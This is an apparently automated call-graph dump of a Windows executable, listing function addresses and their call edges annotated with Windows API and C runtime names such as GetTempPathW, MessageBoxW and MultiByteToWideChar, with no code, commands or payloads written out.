16673 7ff79a319167 LocalFree LocalFree 16671->16673 16672->16673 16674 7ff79a319183 16673->16674 16677 7ff79a31918f 16673->16677 17535 7ff79a312b50 16674->17535 16676 7ff79a31c5c0 _log10_special 8 API calls 16678 7ff79a313c55 16676->16678 16677->16676 16678->16455 16679 7ff79a318850 16678->16679 16680 7ff79a318868 16679->16680 16681 7ff79a3188ea GetTempPathW GetCurrentProcessId 16680->16681 16682 7ff79a31888c 16680->16682 17544 7ff79a3125c0 16681->17544 16684 7ff79a318a20 14 API calls 16682->16684 16685 7ff79a318898 16684->16685 17551 7ff79a3181c0 16685->17551 16693 7ff79a318918 __vcrt_freefls 16713 7ff79a319422 MultiByteToWideChar 16712->16713 16715 7ff79a319446 16712->16715 16714 7ff79a31945c __vcrt_freefls 16713->16714 16713->16715 16714->16467 16715->16714 16716 7ff79a319463 MultiByteToWideChar 16715->16716 16716->16714 16729 7ff79a3133ce memcpy_s 16717->16729 16718 7ff79a3135c7 16719 7ff79a31c5c0 _log10_special 8 API calls 16718->16719 16720 7ff79a313664 16719->16720 16720->16473 16736 7ff79a3190c0 LocalFree 16720->16736 16722 7ff79a311c80 49 API calls 16722->16729 16723 7ff79a3135e2 16725 7ff79a312710 54 API calls 16723->16725 16725->16718 16728 7ff79a3135c9 16731 7ff79a312710 54 API calls 16728->16731 16729->16718 16729->16722 16729->16723 16729->16728 16730 7ff79a312a50 54 API calls 16729->16730 16734 7ff79a3135d0 16729->16734 17740 7ff79a314550 16729->17740 17746 7ff79a317e10 16729->17746 17758 7ff79a311600 16729->17758 17806 7ff79a317110 16729->17806 17810 7ff79a314180 16729->17810 17854 7ff79a314440 16729->17854 16730->16729 16731->16718 16735 7ff79a312710 54 API calls 16734->16735 16735->16718 16738 7ff79a311ca5 16737->16738 16739 7ff79a3249f4 49 API calls 16738->16739 16740 7ff79a311cc8 16739->16740 16740->16405 16742 7ff79a319400 2 API calls 16741->16742 16743 7ff79a318ba4 16742->16743 16744 7ff79a3282a8 38 API calls 16743->16744 16745 7ff79a318bb6 __vcrt_freefls 16744->16745 16745->16418 16747 7ff79a3145bc 16746->16747 16748 7ff79a319400 2 API calls 16747->16748 16749 7ff79a3145e4 16748->16749 16750 7ff79a319400 2 API calls 16749->16750 16751 7ff79a3145f7 16750->16751 18021 7ff79a326004 16751->18021 16754 7ff79a31c5c0 _log10_special 8 API calls 16755 7ff79a31392b 16754->16755 16755->16408 16756 7ff79a317f80 16755->16756 16757 7ff79a317fa4 16756->16757 16758 7ff79a320744 73 API calls 16757->16758 16759 7ff79a31807b __vcrt_freefls 16757->16759 16760 7ff79a317fc0 16758->16760 16759->16412 16760->16759 18413 7ff79a327938 16760->18413 16762 7ff79a320744 73 API calls 16764 7ff79a317fd5 16762->16764 16763 7ff79a32040c _fread_nolock 53 API calls 16763->16764 16764->16759 16764->16762 16764->16763 16766 7ff79a3200ec 16765->16766 18428 7ff79a31fe98 16766->18428 16768 7ff79a320105 16768->16408 16770 7ff79a31c8c0 16769->16770 16771 7ff79a312734 GetCurrentProcessId 16770->16771 16772 7ff79a311c80 49 API calls 16771->16772 16773 7ff79a312787 16772->16773 16774 7ff79a3249f4 49 API calls 16773->16774 16775 7ff79a3127cf 16774->16775 16776 7ff79a312620 12 API calls 16775->16776 16777 7ff79a3127f1 16776->16777 16778 7ff79a31c5c0 _log10_special 8 API calls 16777->16778 16779 7ff79a312801 16778->16779 16779->16473 16781 7ff79a319400 2 API calls 16780->16781 16782 7ff79a318b4c 16781->16782 16783 7ff79a319400 2 API calls 16782->16783 16784 7ff79a318b5c 16783->16784 16785 7ff79a3282a8 38 API calls 16784->16785 16786 7ff79a318b6a __vcrt_freefls 16785->16786 16786->16422 16788 7ff79a311c80 49 API calls 16787->16788 16789 7ff79a3144ed 16788->16789 16789->16449 16791 7ff79a311c80 49 API calls 16790->16791 16792 7ff79a314650 16791->16792 16792->16465 16794 7ff79a316dc5 16793->16794 16795 7ff79a324f78 memcpy_s 11 API calls 16794->16795 16798 7ff79a313e6c 16794->16798 16796 7ff79a316dd2 16795->16796 16797 7ff79a312910 54 API calls 16796->16797 16797->16798 16799 7ff79a317330 16798->16799 18439 7ff79a311470 16799->18439 18545 7ff79a316350 16867->18545 16887 7ff79a3254dc EnterCriticalSection 16880->16887 16889 7ff79a3136bc GetModuleFileNameW 16888->16889 16889->16580 16889->16581 16891 7ff79a31932f FindClose 16890->16891 16892 7ff79a319342 16890->16892 16891->16892 16893 7ff79a31c5c0 _log10_special 8 API calls 16892->16893 16894 7ff79a31371a 16893->16894 16894->16585 16894->16586 16896 7ff79a31c8c0 16895->16896 16897 7ff79a312c70 GetCurrentProcessId 16896->16897 16926 7ff79a3126b0 16897->16926 16899 7ff79a312cb9 16930 7ff79a324c48 16899->16930 16902 7ff79a3126b0 48 API calls 16903 7ff79a312d34 FormatMessageW 16902->16903 16905 7ff79a312d6d 16903->16905 16906 7ff79a312d7f MessageBoxW 16903->16906 16907 7ff79a3126b0 48 API calls 16905->16907 16908 7ff79a31c5c0 _log10_special 8 API calls 16906->16908 16907->16906 16909 7ff79a312daf 16908->16909 16909->16597 16911 7ff79a313730 16910->16911 16912 7ff79a3193b0 GetFinalPathNameByHandleW CloseHandle 16910->16912 16911->16593 16911->16596 16912->16911 16914 7ff79a312834 16913->16914 16915 7ff79a3126b0 48 API calls 16914->16915 16916 7ff79a312887 16915->16916 16917 7ff79a324c48 48 API calls 16916->16917 16918 7ff79a3128d0 MessageBoxW 16917->16918 16919 7ff79a31c5c0 _log10_special 8 API calls 16918->16919 16920 7ff79a312900 16919->16920 16920->16597 16922 7ff79a3194da WideCharToMultiByte 16921->16922 16925 7ff79a319505 16921->16925 16924 7ff79a31951b __vcrt_freefls 16922->16924 16922->16925 16923 7ff79a319522 WideCharToMultiByte 16923->16924 16924->16590 16925->16923 16925->16924 16927 7ff79a3126d5 16926->16927 16928 7ff79a324c48 48 API calls 16927->16928 16929 7ff79a3126f8 16928->16929 16929->16899 16932 7ff79a324ca2 16930->16932 16931 7ff79a324cc7 16934 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 16931->16934 16932->16931 16933 7ff79a324d03 16932->16933 16948 7ff79a323000 16933->16948 16936 7ff79a324cf1 16934->16936 16937 7ff79a31c5c0 _log10_special 8 API calls 16936->16937 16940 7ff79a312d04 16937->16940 16938 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16938->16936 16940->16902 16941 7ff79a324de4 16941->16938 16942 7ff79a324e0a 16942->16941 16945 7ff79a324e14 16942->16945 16943 7ff79a324db9 16946 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16943->16946 16944 7ff79a324db0 16944->16941 16944->16943 16947 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16945->16947 16946->16936 16947->16936 16949 7ff79a32303e 16948->16949 16950 7ff79a32302e 16948->16950 16951 7ff79a323047 16949->16951 16952 7ff79a323075 16949->16952 16953 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 16950->16953 16954 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 16951->16954 16952->16950 16955 7ff79a32306d 16952->16955 16959 7ff79a323a14 16952->16959 16992 7ff79a323460 16952->16992 17029 7ff79a322bf0 16952->17029 16953->16955 16954->16955 16955->16941 16955->16942 16955->16943 16955->16944 16960 7ff79a323ac7 16959->16960 16961 7ff79a323a56 16959->16961 16962 7ff79a323acc 16960->16962 16963 7ff79a323b20 16960->16963 16964 7ff79a323a5c 16961->16964 16965 7ff79a323af1 16961->16965 16966 7ff79a323ace 16962->16966 16967 7ff79a323b01 16962->16967 16968 7ff79a323b2f 16963->16968 16971 7ff79a323b37 16963->16971 16972 7ff79a323b2a 16963->16972 16969 7ff79a323a90 16964->16969 16970 7ff79a323a61 16964->16970 17052 7ff79a321dc4 16965->17052 16978 7ff79a323add 16966->16978 16981 7ff79a323a70 16966->16981 17059 7ff79a3219b4 16967->17059 16990 7ff79a323b60 16968->16990 17070 7ff79a3221d4 16968->17070 16969->16968 16974 7ff79a323a67 16969->16974 16970->16971 16970->16974 17066 7ff79a32471c 16971->17066 16972->16965 16972->16968 16979 7ff79a323aa2 16974->16979 16974->16981 16988 7ff79a323a8b 16974->16988 16978->16965 16982 7ff79a323ae2 16978->16982 16979->16990 17042 7ff79a324504 16979->17042 16981->16990 17032 7ff79a3241c8 16981->17032 16982->16990 17048 7ff79a3245c8 16982->17048 16984 7ff79a31c5c0 _log10_special 8 API calls 16986 7ff79a323e5a 16984->16986 16986->16952 16988->16990 16991 7ff79a323d4c 16988->16991 17077 7ff79a324830 16988->17077 16990->16984 16991->16990 17083 7ff79a32ea78 16991->17083 16993 7ff79a32346e 16992->16993 16994 7ff79a323484 16992->16994 16995 7ff79a3234c4 16993->16995 16996 7ff79a323ac7 16993->16996 16997 7ff79a323a56 16993->16997 16994->16995 16998 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 16994->16998 16995->16952 16999 7ff79a323acc 16996->16999 17000 7ff79a323b20 16996->17000 17001 7ff79a323a5c 16997->17001 17002 7ff79a323af1 16997->17002 16998->16995 17003 7ff79a323ace 16999->17003 17004 7ff79a323b01 16999->17004 17008 7ff79a323b37 17000->17008 17009 7ff79a323b2a 17000->17009 17014 7ff79a323b2f 17000->17014 17005 7ff79a323a90 17001->17005 17006 7ff79a323a61 17001->17006 17010 7ff79a321dc4 38 API calls 17002->17010 17007 7ff79a323a70 17003->17007 17016 7ff79a323add 17003->17016 17012 7ff79a3219b4 38 API calls 17004->17012 17011 7ff79a323a67 17005->17011 17005->17014 17006->17008 17006->17011 17013 7ff79a3241c8 47 API calls 17007->17013 17025 7ff79a323b60 17007->17025 17015 7ff79a32471c 45 API calls 17008->17015 17009->17002 17009->17014 17024 7ff79a323a8b 17010->17024 17011->17007 17017 7ff79a323aa2 17011->17017 17011->17024 17012->17024 17013->17024 17018 7ff79a3221d4 38 API calls 17014->17018 17014->17025 17015->17024 17016->17002 17019 7ff79a323ae2 17016->17019 17020 7ff79a324504 46 API calls 17017->17020 17017->17025 17018->17024 17022 7ff79a3245c8 37 API calls 17019->17022 17019->17025 17020->17024 17021 7ff79a31c5c0 _log10_special 8 API calls 17023 7ff79a323e5a 17021->17023 17022->17024 17023->16952 17024->17025 17026 7ff79a324830 45 API calls 17024->17026 17028 7ff79a323d4c 17024->17028 17025->17021 17026->17028 17027 7ff79a32ea78 46 API calls 17027->17028 17028->17025 17028->17027 17268 7ff79a321038 17029->17268 17033 7ff79a3241ee 17032->17033 17095 7ff79a320bf0 17033->17095 17038 7ff79a324333 17040 7ff79a324830 45 API calls 17038->17040 17041 7ff79a3243c1 17038->17041 17039 7ff79a324830 45 API calls 17039->17038 17040->17041 17041->16988 17043 7ff79a324539 17042->17043 17044 7ff79a324557 17043->17044 17045 7ff79a32457e 17043->17045 17046 7ff79a324830 45 API calls 17043->17046 17047 7ff79a32ea78 46 API calls 17044->17047 17045->16988 17046->17044 17047->17045 17051 7ff79a3245e9 17048->17051 17049 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17050 7ff79a32461a 17049->17050 17050->16988 17051->17049 17051->17050 17053 7ff79a321df7 17052->17053 17054 7ff79a321e26 17053->17054 17056 7ff79a321ee3 17053->17056 17057 7ff79a321e63 17054->17057 17238 7ff79a320c98 17054->17238 17058 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17056->17058 17057->16988 17058->17057 17061 7ff79a3219e7 17059->17061 17060 7ff79a321a16 17062 7ff79a320c98 12 API calls 17060->17062 17065 7ff79a321a53 17060->17065 17061->17060 17063 7ff79a321ad3 17061->17063 17062->17065 17064 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17063->17064 17064->17065 17065->16988 17067 7ff79a32475f 17066->17067 17069 7ff79a324763 __crtLCMapStringW 17067->17069 17246 7ff79a3247b8 17067->17246 17069->16988 17071 7ff79a322207 17070->17071 17072 7ff79a322236 17071->17072 17074 7ff79a3222f3 17071->17074 17073 7ff79a320c98 12 API calls 17072->17073 17076 7ff79a322273 17072->17076 17073->17076 17075 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17074->17075 17075->17076 17076->16988 17078 7ff79a324847 17077->17078 17250 7ff79a32da28 17078->17250 17085 7ff79a32eaa9 17083->17085 17092 7ff79a32eab7 17083->17092 17084 7ff79a32ead7 17087 7ff79a32eae8 17084->17087 17088 7ff79a32eb0f 17084->17088 17085->17084 17086 7ff79a324830 45 API calls 17085->17086 17085->17092 17086->17084 17258 7ff79a330110 17087->17258 17090 7ff79a32eb39 17088->17090 17091 7ff79a32eb9a 17088->17091 17088->17092 17090->17092 17261 7ff79a32f910 17090->17261 17093 7ff79a32f910 _fread_nolock MultiByteToWideChar 17091->17093 17092->16991 17093->17092 17096 7ff79a320c27 17095->17096 17101 7ff79a320c16 17095->17101 17096->17101 17125 7ff79a32d66c 17096->17125 17099 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17099->17101 17100 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17102 7ff79a320c68 17100->17102 17103 7ff79a32e5e0 17101->17103 17102->17099 17104 7ff79a32e5fd 17103->17104 17105 7ff79a32e630 17103->17105 17106 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17104->17106 17105->17104 17107 7ff79a32e662 17105->17107 17116 7ff79a324311 17106->17116 17112 7ff79a32e775 17107->17112 17120 7ff79a32e6aa 17107->17120 17108 7ff79a32e867 17165 7ff79a32dacc 17108->17165 17110 7ff79a32e82d 17158 7ff79a32de64 17110->17158 17112->17108 17112->17110 17113 7ff79a32e7fc 17112->17113 17115 7ff79a32e7bf 17112->17115 17117 7ff79a32e7b5 17112->17117 17151 7ff79a32e144 17113->17151 17141 7ff79a32e374 17115->17141 17116->17038 17116->17039 17117->17110 17119 7ff79a32e7ba 17117->17119 17119->17113 17119->17115 17120->17116 17132 7ff79a32a514 17120->17132 17123 7ff79a32a970 _isindst 17 API calls 17124 7ff79a32e8c4 17123->17124 17126 7ff79a32d6b7 17125->17126 17130 7ff79a32d67b memcpy_s 17125->17130 17128 7ff79a324f78 memcpy_s 11 API calls 17126->17128 17127 7ff79a32d69e HeapAlloc 17129 7ff79a320c54 17127->17129 17127->17130 17128->17129 17129->17100 17129->17102 17130->17126 17130->17127 17131 7ff79a333600 memcpy_s 2 API calls 17130->17131 17131->17130 17133 7ff79a32a52b 17132->17133 17134 7ff79a32a521 17132->17134 17135 7ff79a324f78 memcpy_s 11 API calls 17133->17135 17134->17133 17139 7ff79a32a546 17134->17139 17136 7ff79a32a532 17135->17136 17137 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 17136->17137 17138 7ff79a32a53e 17137->17138 17138->17116 17138->17123 17139->17138 17140 7ff79a324f78 memcpy_s 11 API calls 17139->17140 17140->17136 17174 7ff79a33411c 17141->17174 17145 7ff79a32e420 17145->17116 17146 7ff79a32e471 17227 7ff79a32df60 17146->17227 17147 7ff79a32e41c 17147->17145 17147->17146 17148 7ff79a32e43c 17147->17148 17223 7ff79a32e21c 17148->17223 17152 7ff79a33411c 38 API calls 17151->17152 17153 7ff79a32e18e 17152->17153 17154 7ff79a333b64 37 API calls 17153->17154 17155 7ff79a32e1de 17154->17155 17156 7ff79a32e1e2 17155->17156 17157 7ff79a32e21c 45 API calls 17155->17157 17156->17116 17157->17156 17159 7ff79a33411c 38 API calls 17158->17159 17160 7ff79a32deaf 17159->17160 17161 7ff79a333b64 37 API calls 17160->17161 17162 7ff79a32df07 17161->17162 17163 7ff79a32df0b 17162->17163 17164 7ff79a32df60 45 API calls 17162->17164 17163->17116 17164->17163 17166 7ff79a32db11 17165->17166 17167 7ff79a32db44 17165->17167 17168 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17166->17168 17169 7ff79a32db5c 17167->17169 17171 7ff79a32dbdd 17167->17171 17173 7ff79a32db3d memcpy_s 17168->17173 17170 7ff79a32de64 46 API calls 17169->17170 17170->17173 17172 7ff79a324830 45 API calls 17171->17172 17171->17173 17172->17173 17173->17116 17175 7ff79a33416f fegetenv 17174->17175 17176 7ff79a337e9c 37 API calls 17175->17176 17180 7ff79a3341c2 17176->17180 17177 7ff79a3342b2 17179 7ff79a337e9c 37 API calls 17177->17179 17178 7ff79a3341ef 17182 7ff79a32a514 __std_exception_copy 37 API calls 17178->17182 17181 7ff79a3342dc 17179->17181 17180->17177 17183 7ff79a3341dd 17180->17183 17184 7ff79a33428c 17180->17184 17185 7ff79a337e9c 37 API calls 17181->17185 17186 7ff79a33426d 17182->17186 17183->17177 17183->17178 17187 7ff79a32a514 __std_exception_copy 37 API calls 17184->17187 17188 7ff79a3342ed 17185->17188 17189 7ff79a335394 17186->17189 17195 7ff79a334275 17186->17195 17187->17186 17191 7ff79a338090 20 API calls 17188->17191 17190 7ff79a32a970 _isindst 17 API calls 17189->17190 17192 7ff79a3353a9 17190->17192 17193 7ff79a334356 memcpy_s 17191->17193 17197 7ff79a3346ff memcpy_s 17193->17197 17201 7ff79a334397 memcpy_s 17193->17201 17203 7ff79a324f78 memcpy_s 11 API calls 17193->17203 17194 7ff79a31c5c0 _log10_special 8 API calls 17196 7ff79a32e3c1 17194->17196 17195->17194 17219 7ff79a333b64 17196->17219 17198 7ff79a334a3f 17199 7ff79a333c80 37 API calls 17198->17199 17205 7ff79a335157 17199->17205 17200 7ff79a3349eb 17200->17198 17202 7ff79a3353ac memcpy_s 37 API calls 17200->17202 17213 7ff79a334cdb memcpy_s 17201->17213 17214 7ff79a3347f3 memcpy_s 17201->17214 17202->17198 17204 7ff79a3347d0 17203->17204 17206 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 17204->17206 17207 7ff79a3353ac memcpy_s 37 API calls 17205->17207 17217 7ff79a3351b2 17205->17217 17206->17201 17207->17217 17208 7ff79a335338 17210 7ff79a337e9c 37 API calls 17208->17210 17209 7ff79a324f78 11 API calls memcpy_s 17209->17213 17210->17195 17211 7ff79a324f78 11 API calls memcpy_s 17211->17214 17212 7ff79a32a950 37 API calls _invalid_parameter_noinfo 17212->17214 17213->17198 17213->17200 17213->17209 17218 7ff79a32a950 37 API calls _invalid_parameter_noinfo 17213->17218 17214->17200 17214->17211 17214->17212 17215 7ff79a333c80 37 API calls 17215->17217 17216 7ff79a3353ac memcpy_s 37 API calls 17216->17217 17217->17208 17217->17215 17217->17216 17218->17213 17220 7ff79a333b83 17219->17220 17221 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17220->17221 17222 7ff79a333bae memcpy_s 17220->17222 17221->17222 17222->17147 17224 7ff79a32e248 memcpy_s 17223->17224 17225 7ff79a324830 45 API calls 17224->17225 17226 7ff79a32e302 memcpy_s 17224->17226 17225->17226 17226->17145 17228 7ff79a32df9b 17227->17228 17232 7ff79a32dfe8 memcpy_s 17227->17232 17229 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17228->17229 17230 7ff79a32dfc7 17229->17230 17230->17145 17231 7ff79a32e053 17233 7ff79a32a514 __std_exception_copy 37 API calls 17231->17233 17232->17231 17234 7ff79a324830 45 API calls 17232->17234 17237 7ff79a32e095 memcpy_s 17233->17237 17234->17231 17235 7ff79a32a970 _isindst 17 API calls 17236 7ff79a32e140 17235->17236 17237->17235 17239 7ff79a320cbe 17238->17239 17240 7ff79a320ccf 17238->17240 17239->17057 17240->17239 17241 7ff79a32d66c _fread_nolock 12 API calls 17240->17241 17242 7ff79a320d00 17241->17242 17243 7ff79a320d14 17242->17243 17244 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17242->17244 17245 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17243->17245 17244->17243 17245->17239 17247 7ff79a3247d6 17246->17247 17249 7ff79a3247de 17246->17249 17248 7ff79a324830 45 API calls 17247->17248 17248->17249 17249->17069 17251 7ff79a32486f 17250->17251 17252 7ff79a32da41 17250->17252 17254 7ff79a32da94 17251->17254 17252->17251 17253 7ff79a333374 45 API calls 17252->17253 17253->17251 17255 7ff79a32daad 17254->17255 17256 7ff79a32487f 17254->17256 17255->17256 17257 7ff79a3326c0 45 API calls 17255->17257 17256->16991 17257->17256 17264 7ff79a336df8 17258->17264 17263 7ff79a32f919 MultiByteToWideChar 17261->17263 17267 7ff79a336e5c 17264->17267 17265 7ff79a31c5c0 _log10_special 8 API calls 17266 7ff79a33012d 17265->17266 17266->17092 17267->17265 17269 7ff79a32106d 17268->17269 17270 7ff79a32107f 17268->17270 17271 7ff79a324f78 memcpy_s 11 API calls 17269->17271 17273 7ff79a32108d 17270->17273 17284 7ff79a3210c9 17270->17284 17272 7ff79a321072 17271->17272 17274 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 17272->17274 17275 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17273->17275 17281 7ff79a32107d 17274->17281 17275->17281 17276 7ff79a321445 17277 7ff79a324f78 memcpy_s 11 API calls 17276->17277 17276->17281 17279 7ff79a3216d9 17277->17279 17278 7ff79a324f78 memcpy_s 11 API calls 17280 7ff79a32143a 17278->17280 17282 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 17279->17282 17283 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 17280->17283 17281->16952 17282->17281 17283->17276 17284->17276 17284->17278 17286 7ff79a320774 17285->17286 17313 7ff79a3204d4 17286->17313 17288 7ff79a32078d 17288->16609 17325 7ff79a32042c 17289->17325 17293 7ff79a31c8c0 17292->17293 17294 7ff79a312930 GetCurrentProcessId 17293->17294 17295 7ff79a311c80 49 API calls 17294->17295 17296 7ff79a312979 17295->17296 17339 7ff79a3249f4 17296->17339 17301 7ff79a311c80 49 API calls 17302 7ff79a3129ff 17301->17302 17369 7ff79a312620 17302->17369 17305 7ff79a31c5c0 _log10_special 8 API calls 17306 7ff79a312a31 17305->17306 17306->16648 17308 7ff79a320189 17307->17308 17312 7ff79a311b89 17307->17312 17309 7ff79a324f78 memcpy_s 11 API calls 17308->17309 17310 7ff79a32018e 17309->17310 17311 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 17310->17311 17311->17312 17312->16647 17312->16648 17314 7ff79a32053e 17313->17314 17315 7ff79a3204fe 17313->17315 17314->17315 17317 7ff79a32054a 17314->17317 17316 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17315->17316 17318 7ff79a320525 17316->17318 17324 7ff79a3254dc EnterCriticalSection 17317->17324 17318->17288 17326 7ff79a320456 17325->17326 17337 7ff79a311a20 17325->17337 17327 7ff79a3204a2 17326->17327 17329 7ff79a320465 memcpy_s 17326->17329 17326->17337 17338 7ff79a3254dc EnterCriticalSection 17327->17338 17331 7ff79a324f78 memcpy_s 11 API calls 17329->17331 17333 7ff79a32047a 17331->17333 17335 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 17333->17335 17335->17337 17337->16616 17337->16617 17341 7ff79a324a4e 17339->17341 17340 7ff79a324a73 17342 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17340->17342 17341->17340 17343 7ff79a324aaf 17341->17343 17345 7ff79a324a9d 17342->17345 17378 7ff79a322c80 17343->17378 17349 7ff79a31c5c0 _log10_special 8 API calls 17345->17349 17347 7ff79a324b8c 17348 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17347->17348 17348->17345 17350 7ff79a3129c3 17349->17350 17357 7ff79a3251d0 17350->17357 17351 7ff79a324bb0 17351->17347 17354 7ff79a324bba 17351->17354 17352 7ff79a324b61 17355 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17352->17355 17353 7ff79a324b58 17353->17347 17353->17352 17356 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17354->17356 17355->17345 17356->17345 17358 7ff79a32b338 memcpy_s 11 API calls 17357->17358 17359 7ff79a3251e7 17358->17359 17360 7ff79a3129e5 17359->17360 17361 7ff79a32ec08 memcpy_s 11 API calls 17359->17361 17364 7ff79a325227 17359->17364 17360->17301 17362 7ff79a32521c 17361->17362 17363 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17362->17363 17363->17364 17364->17360 17516 7ff79a32ec90 17364->17516 17367 7ff79a32a970 _isindst 17 API calls 17368 7ff79a32526c 17367->17368 17370 7ff79a31262f 17369->17370 17371 7ff79a319400 2 API calls 17370->17371 17372 7ff79a312660 17371->17372 17373 7ff79a31266f MessageBoxW 17372->17373 17374 7ff79a312683 MessageBoxA 17372->17374 17375 7ff79a312690 17373->17375 17374->17375 17376 7ff79a31c5c0 _log10_special 8 API calls 17375->17376 17377 7ff79a3126a0 17376->17377 17377->17305 17379 7ff79a322cbe 17378->17379 17380 7ff79a322cae 17378->17380 17381 7ff79a322cc7 17379->17381 17388 7ff79a322cf5 17379->17388 17383 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17380->17383 17384 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17381->17384 17382 7ff79a322ced 17382->17347 17382->17351 17382->17352 17382->17353 17383->17382 17384->17382 17385 7ff79a324830 45 API calls 17385->17388 17387 7ff79a322fa4 17390 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17387->17390 17388->17380 17388->17382 17388->17385 17388->17387 17392 7ff79a323610 17388->17392 17418 7ff79a3232d8 17388->17418 17448 7ff79a322b60 17388->17448 17390->17380 17393 7ff79a323652 17392->17393 17394 7ff79a3236c5 17392->17394 17395 7ff79a323658 17393->17395 17396 7ff79a3236ef 17393->17396 17397 7ff79a3236ca 17394->17397 17398 7ff79a32371f 17394->17398 17405 7ff79a32365d 17395->17405 17409 7ff79a32372e 17395->17409 17465 7ff79a321bc0 17396->17465 17399 7ff79a3236cc 17397->17399 17400 7ff79a3236ff 17397->17400 17398->17396 17398->17409 17416 7ff79a323688 17398->17416 17402 7ff79a32366d 17399->17402 17408 7ff79a3236db 17399->17408 17472 7ff79a3217b0 17400->17472 17417 7ff79a32375d 17402->17417 17451 7ff79a323f74 17402->17451 17405->17402 17407 7ff79a3236a0 17405->17407 17405->17416 17407->17417 17461 7ff79a324430 17407->17461 17408->17396 17411 7ff79a3236e0 17408->17411 17409->17417 17479 7ff79a321fd0 17409->17479 17413 7ff79a3245c8 37 API calls 17411->17413 17411->17417 17412 7ff79a31c5c0 _log10_special 8 API calls 17414 7ff79a3239f3 17412->17414 17413->17416 17414->17388 17416->17417 17486 7ff79a32e8c8 17416->17486 17417->17412 17419 7ff79a3232e3 17418->17419 17420 7ff79a3232f9 17418->17420 17421 7ff79a323337 17419->17421 17422 7ff79a323652 17419->17422 17423 7ff79a3236c5 17419->17423 17420->17421 17424 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17420->17424 17421->17388 17425 7ff79a323658 17422->17425 17426 7ff79a3236ef 17422->17426 17427 7ff79a3236ca 17423->17427 17428 7ff79a32371f 17423->17428 17424->17421 17435 7ff79a32365d 17425->17435 17437 7ff79a32372e 17425->17437 17431 7ff79a321bc0 38 API calls 17426->17431 17429 7ff79a3236cc 17427->17429 17430 7ff79a3236ff 17427->17430 17428->17426 17428->17437 17446 7ff79a323688 17428->17446 17432 7ff79a32366d 17429->17432 17439 7ff79a3236db 17429->17439 17433 7ff79a3217b0 38 API calls 17430->17433 17431->17446 17434 7ff79a323f74 47 API calls 17432->17434 17447 7ff79a32375d 17432->17447 17433->17446 17434->17446 17435->17432 17436 7ff79a3236a0 17435->17436 17435->17446 17440 7ff79a324430 47 API calls 17436->17440 17436->17447 17438 7ff79a321fd0 38 API calls 17437->17438 17437->17447 17438->17446 17439->17426 17441 7ff79a3236e0 17439->17441 17440->17446 17443 7ff79a3245c8 37 API calls 17441->17443 17441->17447 17442 7ff79a31c5c0 _log10_special 8 API calls 17444 7ff79a3239f3 17442->17444 17443->17446 17444->17388 17445 7ff79a32e8c8 47 API calls 17445->17446 17446->17445 17446->17447 17447->17442 17499 7ff79a320d84 17448->17499 17452 7ff79a323f96 17451->17452 17453 7ff79a320bf0 12 API calls 17452->17453 17454 7ff79a323fde 17453->17454 17455 7ff79a32e5e0 46 API calls 17454->17455 17457 7ff79a3240b1 17455->17457 17456 7ff79a3240d3 17458 7ff79a32415c 17456->17458 17460 7ff79a324830 45 API calls 17456->17460 17457->17456 17459 7ff79a324830 45 API calls 17457->17459 17458->17416 17459->17456 17460->17458 17462 7ff79a3244b0 17461->17462 17463 7ff79a324448 17461->17463 17462->17416 17463->17462 17464 7ff79a32e8c8 47 API calls 17463->17464 17464->17462 17466 7ff79a321bf3 17465->17466 17467 7ff79a321c22 17466->17467 17469 7ff79a321cdf 17466->17469 17468 7ff79a320bf0 12 API calls 17467->17468 17471 7ff79a321c5f 17467->17471 17468->17471 17470 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17469->17470 17470->17471 17471->17416 17473 7ff79a3217e3 17472->17473 17474 7ff79a321812 17473->17474 17476 7ff79a3218cf 17473->17476 17475 7ff79a320bf0 12 API calls 17474->17475 17478 7ff79a32184f 17474->17478 17475->17478 17477 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17476->17477 17477->17478 17478->17416 17480 7ff79a322003 17479->17480 17481 7ff79a322032 17480->17481 17483 7ff79a3220ef 17480->17483 17482 7ff79a320bf0 12 API calls 17481->17482 17485 7ff79a32206f 17481->17485 17482->17485 17484 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17483->17484 17484->17485 17485->17416 17487 7ff79a32e8f0 17486->17487 17488 7ff79a32e935 17487->17488 17489 7ff79a324830 45 API calls 17487->17489 17492 7ff79a32e8f5 memcpy_s 17487->17492 17495 7ff79a32e91e memcpy_s 17487->17495 17488->17492 